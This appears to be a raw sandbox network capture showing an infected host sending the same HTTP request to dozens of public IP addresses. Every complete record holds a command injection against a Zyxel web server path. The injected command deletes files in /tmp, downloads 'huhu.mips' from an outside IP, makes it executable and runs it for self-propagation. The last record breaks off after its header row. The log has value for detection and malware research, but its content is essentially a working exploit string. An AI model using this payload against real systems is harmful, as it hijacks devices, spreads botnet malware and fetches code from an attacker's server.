                                                      Feb 2, 2024 06:36:02.838340044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6714192.168.2.145350649.89.125.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838412046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6715192.168.2.143719480.238.60.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838462114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6716192.168.2.1449534194.230.8.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838511944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6717192.168.2.1446826123.5.174.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838555098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6718192.168.2.1454536102.29.32.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838582039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6719192.168.2.1446018151.42.194.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838637114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6720192.168.2.1457854169.218.161.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838681936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6721192.168.2.1438126164.109.40.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838727951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6722192.168.2.144383867.143.216.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838773012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6723192.168.2.143322685.109.71.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838820934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6724192.168.2.1440560139.208.136.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838857889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6725192.168.2.145720052.153.17.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838896036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6726192.168.2.1432884181.124.120.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838928938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6727192.168.2.145315287.5.53.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838993073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6728192.168.2.1441196121.17.65.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839034081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6729192.168.2.144886219.26.236.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839063883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6730192.168.2.1450960161.235.237.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839102030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6731192.168.2.1438560196.77.220.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839128017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6732192.168.2.1456870113.80.158.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839169025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6733192.168.2.144659066.165.91.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839212894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6734192.168.2.1440470135.150.79.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839246988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6735192.168.2.144500099.250.235.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839301109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6736192.168.2.14404162.196.42.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839334011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6737192.168.2.1459870155.214.245.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839378119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6738192.168.2.1448118123.60.254.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839416027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6739192.168.2.1440716174.199.233.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839459896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6740192.168.2.144536881.67.17.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839504004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6741192.168.2.1433600222.158.183.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839545012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6742192.168.2.143972038.78.70.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839600086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6743192.168.2.145231244.134.244.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839641094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6744192.168.2.14586245.60.196.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839689016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6745192.168.2.1441034161.202.10.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839715958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6746192.168.2.1455352177.104.163.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839781046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6747192.168.2.144880872.216.159.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839822054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6748192.168.2.1445406139.160.223.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839859962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6749192.168.2.14354121.77.127.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839911938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6750192.168.2.145680275.53.38.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839935064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6751192.168.2.1446126155.213.105.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.839967966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6752192.168.2.1451934165.119.220.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840013981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6753192.168.2.1433236120.187.182.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840045929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6754192.168.2.1438758137.254.210.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840096951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6755192.168.2.143406295.191.36.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840126991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6756192.168.2.1444252181.129.175.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840162039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6757192.168.2.1435316106.105.200.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840208054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6758192.168.2.1452612202.122.82.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840256929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6759192.168.2.1459682209.228.228.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840321064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6760192.168.2.145187467.74.72.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840344906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6761192.168.2.1438442160.238.19.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840393066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6762192.168.2.1454368124.161.104.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840409040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6763192.168.2.1434162136.38.236.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840462923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6764192.168.2.145326473.44.140.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840507984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6765192.168.2.14337005.252.49.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840554953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6766192.168.2.1438220202.62.7.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840605974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6767192.168.2.1443464223.227.29.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840661049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6768192.168.2.1444778155.113.228.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840701103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6769192.168.2.1434512178.195.26.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840744019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6770192.168.2.145253069.65.145.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840799093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6771192.168.2.1450602210.102.191.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840812922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6772192.168.2.1456766175.126.33.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840871096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6773192.168.2.143687471.135.134.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840903044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6774192.168.2.145276696.84.28.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840954065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6775192.168.2.145338094.4.170.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.840975046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6776192.168.2.145343483.92.42.183443
                                                      TimestampBytes transferredDirectionData
